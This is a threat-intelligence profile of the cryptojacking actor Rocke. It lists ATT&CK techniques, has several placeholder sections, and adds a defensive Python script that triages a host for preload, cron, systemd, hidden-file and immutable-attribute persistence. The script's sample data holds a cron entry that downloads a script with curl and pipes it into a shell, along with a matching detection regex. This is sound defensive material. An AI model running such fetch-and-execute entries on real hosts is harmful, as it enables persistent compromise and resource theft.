Introduction
Rocke is an alleged Chinese-speaking adversary whose primary objective appears to be cryptojacking: hijacking victim system resources to mine cryptocurrency. The name comes from the email address "rocke@live.cn" used to create the wallet that received the mined cryptocurrency. Researchers have noted overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed [2].
Activities and Tactics
Information pending cataloguing.
Notable Campaigns
Information pending cataloguing.
Tactics, Techniques, and Procedures (TTPs)
- T1190 Exploit Public-Facing Application
- T1014 Rootkit
- T1027 Obfuscated Files or Information
- T1102 Web Service
- T1059.004 Unix Shell
- T1082 System Information Discovery
- T1071 Application Layer Protocol
- T1105 Ingress Tool Transfer
- T1496.001 Compute Hijacking
- T1027.004 Compile After Delivery
- T1574.006 Dynamic Linker Hijacking
- T1564.001 Hidden Files and Directories
- T1053.003 Cron
- T1059.006 Python
- T1046 Network Service Discovery
- T1055.002 Portable Executable Injection
- T1102.001 Dead Drop Resolver
- T1037 Boot or Logon Initialization Scripts
- T1027.002 Software Packing
- T1547.001 Registry Run Keys / Startup Folder
- T1222.002 Linux and Mac Permissions
- T1057 Process Discovery
- T1543.002 Systemd Service
- T1018 Remote System Discovery
- T1562.004 Disable or Modify System Firewall
- T1140 Deobfuscate/Decode Files or Information
- T1070.002 Clear Linux or Mac System Logs
- T1552.004 Private Keys
- T1070.004 File Deletion
- T1071.001 Web Protocols
- T1562.001 Disable or Modify Tools
- T1571 Non-Standard Port
- T1021.004 SSH
- T1070.006 Timestomp
- T1036.005 Match Legitimate Resource Name or Location
- T1518.001 Security Software Discovery
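Several of the techniques above (T1574.006 Dynamic Linker Hijacking, T1053.003 Cron, T1543.002 Systemd Service, T1564.001 Hidden Files and Directories, T1222.002 Linux and Mac Permissions) leave host artifacts that a responder can check for directly. The triage script below is an added example, not code from the Talos report or from the actor's toolset: it runs the checks over an in-memory snapshot of a host (file contents plus the set of paths carrying the ext4 immutable attribute, as `lsattr` would report it) so it works offline. The sample snapshot, the library name `libsyslog.so`, the unit name `kthreadd.service`, the scratch-directory list and the download-and-pipe regex are all assumptions constructed for the demonstration; the IP address is from the RFC 5737 documentation range.

```python
"""Host triage for Linux persistence and defence-evasion techniques in the TTP list.
Added example: not from the Talos report or the actor's code. All paths, names and
the sample snapshot below are constructed for illustration."""
import re
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Finding:
    technique: str   # ATT&CK technique ID from the list above
    path: str
    detail: str


@dataclass
class Snapshot:
    """Files of interest (path -> text) and the set of paths that carry the
    immutable attribute (what `lsattr -R` would show as 'i')."""
    files: dict
    immutable: set = field(default_factory=set)


# Assumptions for this example: services and preloaded libraries should not live here.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
CRON_DIRS = ("/etc/cron.d/", "/etc/cron.hourly/", "/etc/cron.daily/", "/var/spool/cron/")
UNIT_DIRS = ("/etc/systemd/system/", "/usr/lib/systemd/system/", "/lib/systemd/system/")
# Download-and-pipe-to-shell pattern typical of cron-based droppers (constructed).
FETCH_PIPE_SHELL = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|da)?sh\b")
# Files an intruder tends to lock with `chattr +i` to protect persistence.
PROTECTED_FILES = ("/etc/ld.so.preload", "/etc/hosts", "/root/.ssh/authorized_keys")


def _under(path, dirs):
    return any(path.startswith(d) for d in dirs)


def _hidden_component(path):
    return any(part.startswith(".") for part in path.split("/") if part)


def check_ld_preload(snap):
    """T1574.006: every library in /etc/ld.so.preload is injected into each
    dynamically linked process; on most hosts the file should not exist at all."""
    text = snap.files.get("/etc/ld.so.preload")
    if text is None:
        return []
    return [Finding("T1574.006", "/etc/ld.so.preload", f"preloads {lib}")
            for lib in text.split() if not lib.startswith("#")]


def check_cron(snap):
    """T1053.003: cron entries that fetch-and-pipe into a shell or run from scratch dirs."""
    out = []
    for path, text in snap.files.items():
        if not _under(path, CRON_DIRS):
            continue
        for line in text.splitlines():
            line = line.strip()
            if not line or line.startswith("#"):
                continue
            if FETCH_PIPE_SHELL.search(line) or any(d in line for d in SCRATCH_DIRS):
                out.append(Finding("T1053.003", path, line))
    return out


def check_systemd(snap):
    """T1543.002: unit files whose ExecStart points into a scratch or dot-named path."""
    out = []
    for path, text in snap.files.items():
        if not _under(path, UNIT_DIRS):
            continue
        for line in text.splitlines():
            if line.startswith("ExecStart="):
                cmd = line.split("=", 1)[1].lstrip("-@+!:").strip()  # strip systemd prefixes
                binary = cmd.split()[0] if cmd else ""
                if _under(binary, SCRATCH_DIRS) or _hidden_component(binary):
                    out.append(Finding("T1543.002", path, line))
    return out


def check_hidden(snap):
    """T1564.001: files placed under dot-named paths inside scratch directories."""
    return [Finding("T1564.001", p, "hidden path in scratch directory")
            for p in snap.files if _under(p, SCRATCH_DIRS) and _hidden_component(p)]


def check_immutable(snap):
    """T1222.002: immutable attribute on files root would normally be able to edit."""
    return [Finding("T1222.002", p, "immutable attribute set")
            for p in sorted(snap.immutable)
            if p in PROTECTED_FILES or _under(p, CRON_DIRS + UNIT_DIRS)]


def triage(snap):
    findings = []
    for check in (check_ld_preload, check_cron, check_systemd, check_hidden, check_immutable):
        findings.extend(check(snap))
    return findings


# Constructed sample snapshot (not data from a real host or from the report).
SAMPLE = Snapshot(
    files={
        "/etc/ld.so.preload": "/usr/local/lib/libsyslog.so\n",
        "/etc/cron.d/updater": "*/10 * * * * root curl -fsSL http://203.0.113.10/up.sh | sh\n",
        "/etc/cron.d/logrotate": "0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n",
        "/etc/systemd/system/kthreadd.service": "[Service]\nExecStart=/tmp/.x/kthreadd\n",
        "/etc/systemd/system/sshd.service": "[Service]\nExecStart=/usr/sbin/sshd -D\n",
        "/tmp/.x/kthreadd": "<elf binary>",
    },
    immutable={"/etc/ld.so.preload", "/etc/cron.d/updater"},
)

if __name__ == "__main__":
    for f in triage(SAMPLE):
        print(f"{f.technique}  {f.path}: {f.detail}")
```

Against the sample snapshot the script reports six findings covering all five techniques; the benign `logrotate` cron entry and the stock `sshd.service` are not flagged. To use it live, populate a `Snapshot` by reading the cron, unit and preload paths and parsing `lsattr` output; the immutable check matters because `rm` and editors fail silently-looking on `chattr +i` files until the attribute is cleared.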
ATT&CK technique IDs (denormalized)
- T1014
- T1018
- T1021.004
- T1027
- T1027.002
- T1027.004
- T1036.005
- T1037
- T1046
- T1053.003
- T1055.002
- T1057
- T1059.004
- T1059.006
- T1070.002
- T1070.004
- T1070.006
- T1071
- T1071.001
- T1082
- T1102
- T1102.001
- T1105
- T1140
- T1190
- T1222.002
- T1496.001
- T1518.001
- T1543.002
- T1547.001
- T1552.004
- T1562.001
- T1562.004
- T1564.001
- T1571
- T1574.006
Notable Indicators of Compromise (IOCs)
No curated IOCs are currently published for this actor. This section will be updated when stable, attributable indicators are available.
Malware and Tools
- CyberGate: information pending cataloguing.
- Cyber Eye RAT: information pending cataloguing.
- Archelaus Beta: information pending cataloguing.
Attribution and Evidence
Information pending cataloguing.
References
[1] MITRE ATT&CK.
[2] Liebenberg, D. (2018, August 30). Rocke: The Champion of Monero Miners. Cisco Talos. Retrieved May 26, 2020.